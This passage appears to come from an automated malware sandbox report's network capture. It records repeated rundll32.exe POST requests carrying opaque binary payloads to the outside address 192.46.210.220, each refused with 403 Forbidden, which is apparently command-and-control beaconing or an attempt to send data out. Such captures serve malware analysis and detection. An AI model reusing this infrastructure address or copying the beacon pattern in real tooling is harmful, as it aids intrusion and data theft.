                                                                                                      2021-10-28 02:55:52 UTC229OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:53 UTC234INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:53 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      47192.168.2.749943192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:53 UTC234OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:53 UTC234OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:54 UTC239INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:54 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      48192.168.2.749948192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:56 UTC239OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:56 UTC239OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:57 UTC244INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:57 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      49192.168.2.749950192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:57 UTC244OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:57 UTC244OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:58 UTC249INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:58 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      5192.168.2.749742192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:28 UTC24OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:28 UTC25OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:29 UTC29INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:29 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      50192.168.2.749956192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:00 UTC249OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:00 UTC249OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:01 UTC254INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:01 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      51192.168.2.749959192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:01 UTC254OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:01 UTC254OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:02 UTC259INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:02 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      52192.168.2.749964192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:04 UTC259OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:04 UTC259OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:05 UTC264INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:04 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      53192.168.2.749966192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:05 UTC264OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:05 UTC264OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:06 UTC269INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:06 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      54192.168.2.749971192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:08 UTC269OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:08 UTC269OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:08 UTC274INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:08 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      55192.168.2.749977192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:09 UTC274OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:09 UTC274OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:10 UTC279INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:10 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      56192.168.2.749991192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:11 UTC279OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:11 UTC279OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:12 UTC284INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:12 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      57192.168.2.750004192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:13 UTC284OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:13 UTC284OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:14 UTC289INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:14 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      58192.168.2.750017192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:15 UTC289OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
